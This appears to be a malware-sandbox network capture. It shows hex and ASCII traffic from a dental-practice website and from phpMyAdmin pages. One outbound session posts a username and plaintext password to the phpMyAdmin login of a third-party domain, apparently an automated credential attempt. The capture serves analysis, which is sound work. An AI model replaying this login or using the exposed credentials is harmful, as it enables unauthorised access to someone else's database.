2024-02-20 23:26:26 UTC	16384	IN	Data Raw: 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 37 29 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 3e 20 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 7d 68 31 2e 77 69 64 67 65 74 2d 74 69 74 6c Data Ascii: .is-style-outline:not(.has-background),.wp-block-button.is-style-outline>.wp-block-button__link.wp-element-button:not(.has-background){background-color:var(--ast-global-color-7);}.entry-content[ast-blocks-layout] > figure{margin-bottom:1em;}h1.widget-titl
2024-02-20 23:26:26 UTC	16384	IN	Data Raw: 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 66 75 6c 6c 2c 2e 61 73 74 2d 70 6c 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 77 69 64 65 2c 2e 61 73 74 2d 70 61 67 65 2d 62 75 69 6c 64 65 72 2d 74 65 6d 70 6c 61 74 65 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 77 69 64 65 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 Data Ascii: t-no-sidebar .entry-content .wp-block-column .alignfull,.ast-plain-container.ast-no-sidebar .entry-content .wp-block-column .alignwide,.ast-page-builder-template.ast-no-sidebar .entry-content .wp-block-column .alignwide {margin-left: auto;margin-right: au
2024-02-20 23:26:26 UTC	16384	IN	Data Raw: 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 34 35 70 78 3b 7d 2e 73 69 74 65 2d 70 72 69 6d 61 72 79 2d 66 6f 6f 74 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 70 72 69 6d 61 72 79 2d 66 6f 6f 74 65 72 2d 62 75 69 6c 64 65 72 22 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 38 29 3b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 Data Ascii: dding-bottom:45px;}.site-primary-footer-wrap[data-section="section-primary-footer-builder"]{background-color:var(--ast-global-color-8);;background-image:none;;border-style:solid;border-width:0px;border-top-width:1px;border-top-color:var(--ast-global-color
2024-02-20 23:26:26 UTC	16384	IN	Data Raw: 29 7b 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 77 72 61 70 20 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 2c 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 20 2e 73 69 74 65 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 77 72 61 70 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 70 78 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 34 34 70 78 29 7b 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 77 72 61 70 20 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 20 2c 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 20 2e 73 69 74 65 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 77 72 61 70 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 Data Ascii: ){.ast-mobile-header-wrap .ast-primary-header-bar,.ast-primary-header-bar .site-primary-header-wrap{min-height:100px;}}@media (max-width:544px){.ast-mobile-header-wrap .ast-primary-header-bar ,.ast-primary-header-bar .site-primary-header-wrap{min-height:8
2024-02-20 23:26:26 UTC	16384	IN	Data Raw: 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 34 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 34 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 2d 62 61 Data Ascii: s-ast-global-color-3-background-color{background-color: var(--wp--preset--color--ast-global-color-3) !important;}.has-ast-global-color-4-background-color{background-color: var(--wp--preset--color--ast-global-color-4) !important;}.has-ast-global-color-5-ba
2024-02-20 23:26:26 UTC	16384	IN	Data Raw: 6c 65 2d 70 6f 73 74 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 2e 35 65 6d 3b 7d 2e 73 69 6e 67 6c 65 20 2e 61 73 74 2d 61 75 74 68 6f 72 2d 6d 65 74 61 20 2e 61 73 74 2d 61 75 74 68 6f 72 2d 64 65 74 61 69 6c 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 7d 2e 70 6f 73 74 2d 61 75 74 68 6f 72 2d 62 69 6f 20 2e 61 75 74 68 6f 72 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 32 32 70 78 29 7b 2e 73 69 6e 67 6c 65 20 2e 70 6f 73 74 2d 61 75 74 68 6f 72 2d 61 76 61 74 61 72 2c 2e 73 69 6e 67 6c 65 20 2e 70 6f 73 74 2d 61 75 74 68 6f 72 2d 62 69 6f 7b 66 6c 6f 61 74 3a 6c Data Ascii: le-post:last-child{margin-bottom:2.5em;}.single .ast-author-meta .ast-author-details{display:flex;align-items:center;}.post-author-bio .author-title{margin-bottom:10px;}}@media (min-width:922px){.single .post-author-avatar,.single .post-author-bio{float:l
2024-02-20 23:26:26 UTC	16384	IN	Data Raw: 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 70 6f 73 74 2d 31 38 32 34 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 63 73 73 2f 70 6f 73 74 2d 31 38 32 34 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 37 35 33 34 36 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 73 2d 65 6b 69 74 69 63 6f 6e 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f Data Ascii: 2' media='all' /><link rel='stylesheet' id='elementor-post-1824-css' href='https://www.cabinet-orsika.fr/wp-content/uploads/elementor/css/post-1824.css?ver=1703753462' media='all' /><link rel='stylesheet' id='elementor-icons-ekiticons-css' href='https:/
2024-02-20 23:26:26 UTC	16384	IN	Data Raw: 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 39 32 31 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 2f 64 72 2d 66 69 72 61 6e 64 65 2d 6b 61 68 61 6c 65 68 2f 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 75 62 2d 69 74 65 6d 20 6d 65 6e 75 2d 6c 69 6e 6b 22 3e 44 72 20 46 69 72 61 6e 64 65 20 4b 41 48 41 4c 45 48 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d Data Ascii: em menu-item-type-post_type menu-item-object-page menu-item-1921"><a href="https://www.cabinet-orsika.fr/dr-firande-kahaleh/" class="elementor-sub-item menu-link">Dr Firande KAHALEH</a></li><li class="menu-item menu-item-type-post_type menu-item-object-
2024-02-20 23:26:26 UTC	16384	IN	Data Raw: 65 6e 74 6f 72 2d 73 75 62 2d 69 74 65 6d 20 6d 65 6e 75 2d 6c 69 6e 6b 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 50 61 72 6f 64 6f 6e 74 6f 6c 6f 67 69 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 39 34 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 2f 70 72 6f 70 68 79 6c 61 78 69 65 2d 64 65 6e 74 61 69 72 65 2d 6e 6f 69 73 79 2d 6c 65 2d 72 6f 69 2f 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 75 62 2d 69 74 65 6d 20 6d 65 6e 75 Data Ascii: entor-sub-item menu-link" tabindex="-1">Parodontologie</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1942"><a href="https://www.cabinet-orsika.fr/prophylaxie-dentaire-noisy-le-roi/" class="elementor-sub-item menu

Session ID	Source IP	Source Port	Destination IP	Destination Port
332	192.168.2.6	60871	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:24 UTC	398	OUT	POST /phpmyadmin/index.php?route=/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: phpMyAdmin_https=v9qkgod3ikn4df2eqtt58f8s6s; pma_lang_https=en User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/phpmyadmin/ Content-Length: 174 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:24 UTC	174	OUT	Data Raw: 72 6f 75 74 65 3d 25 32 46 26 6c 61 6e 67 3d 65 6e 26 74 6f 6b 65 6e 3d 33 35 32 37 36 36 33 31 33 34 34 38 35 63 32 39 32 33 33 37 35 30 36 30 33 66 32 35 36 37 33 38 26 73 65 74 5f 73 65 73 73 69 6f 6e 3d 76 39 71 6b 67 6f 64 33 69 6b 6e 34 64 66 32 65 71 74 74 35 38 66 38 73 36 73 26 70 6d 61 5f 75 73 65 72 6e 61 6d 65 3d 6a 61 73 6f 6e 25 34 30 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 26 70 6d 61 5f 70 61 73 73 77 6f 72 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 73 65 72 76 65 72 3d 31 Data Ascii: route=%2F&lang=en&token=3527663134485c29233750603f256738&set_session=v9qkgod3ikn4df2eqtt58f8s6s&pma_username=jason%40fortressrealcapital.com&pma_password=fortress%21&server=1
2024-02-20 23:26:25 UTC	1361	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:25 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:25 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: phpMyAdmin_https=52vnjks7i0ag4bmq91c59fr8u9; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: pmaAuth-1_https=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/phpmyadmin/; secure last-modified: Tue, 20 Feb 2024 23:26:25 GMT
2024-02-20 23:26:25 UTC	449	IN	Data Raw: 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 7a 32 49 54 62 62 65 77 38 35 43 35 65 4b 34 6c 35 49 4a 43 59 4f 49 64 36 72 78 66 41 48 41 57 46 37 67 36 4f 68 53 4e 43 6f 30 6b 50 33 38 66 71 42 65 54 75 4b 34 4d 53 7a 7a 45 70 6e 54 62 48 6d 66 6a 6d 4b 6e 30 70 75 78 6f 32 43 51 39 59 4d 72 4d 62 70 67 32 58 67 25 32 42 74 30 57 25 32 42 44 79 44 76 69 66 30 30 4a 36 52 47 37 79 6d 6b 70 72 77 68 76 6b 54 25 32 46 72 6e 6f 25 32 46 70 4e 58 51 31 77 61 59 74 38 55 31 67 4d 56 34 6f 59 77 25 Data Ascii: CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z2ITbbew85C5eK4l5IJCYOId6rxfAHAWF7g6OhSNCo0kP38fqBeTuK4MSzzEpnTbHmfjmKn0puxo2CQ9YMrMbpg2Xg%2Bt0W%2BDyDvif00J6RG7ymkprwhvkT%2Frno%2FpNXQ1waYt8U1gMV4oYw%
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 34 61 36 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 4a65<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6e Data Ascii: data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/n
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a Data Ascii: codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></script>
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 2e 63 6c 6f 73 65 54 65 78 74 20 3d 20 27 44 6f 6e 65 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 Data Ascii: .closeText = 'Done'; $.datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March',
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 6c 5b 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c Data Ascii: l[''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 20 6d 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 Data Ascii: max: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u00
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 76 61 6c 69 64 61 74 65 2e 6d 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e Data Ascii: jquery/jquery.validate.min.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) 